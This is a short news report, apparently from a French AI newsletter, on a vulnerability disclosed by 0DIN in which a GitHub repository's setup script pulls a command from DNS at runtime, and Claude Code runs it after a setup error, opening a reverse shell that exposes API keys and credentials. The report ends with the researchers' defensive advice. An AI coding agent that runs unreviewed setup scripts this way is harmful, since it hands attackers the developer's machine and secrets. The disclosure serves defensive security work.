Vulnerable Claude Code: Compromised GitHub Repository Takes Control
Le brief IA que les pros lisent chaque soir
Les 7 actus IA du jour, décryptées en 5 min. Gratuit.
Inclus dès l'inscription : notre sélection des meilleurs guides & comparatifs IA.
Choisis ton rythme
Gratuit · Pas de spam · Désabonnement en 1 clic
Vulnerable Claude Code: A Compromised GitHub Repository Takes Control
Security researchers from 0DIN, Mozilla's GenAI bug bounty platform, have discovered a new attack vector targeting developers' machines. Through a seemingly normal GitHub repository, attackers can gain full control via an indirect prompt injection as soon as someone uses an AI coding tool like Claude Code.
A configuration script in the repository retrieves a command from a DNS input at runtime and executes it. The malicious code never actually exists in the repository itself, making it invisible to scanners, code reviews, and the AI agent. Claude Code encounters a routine error message during setup, automatically executes the script, and opens a reverse shell to the attacker. From there, the attacker can retrieve API keys and login credentials, while maintaining persistent access. A simple link to a repository in a job offer, a tutorial, or a Slack message is enough to compromise anyone who opens it with an AI coding tool.
The solution, according to the researchers: AI agents should display the content of a configuration script before executing it. Additionally, developers should consider configuration instructions in third-party repositories as untrusted code.
Brief IA — L'actualité IA en français
L'essentiel de l'actualité de l'intelligence artificielle, décrypté et expliqué chaque jour.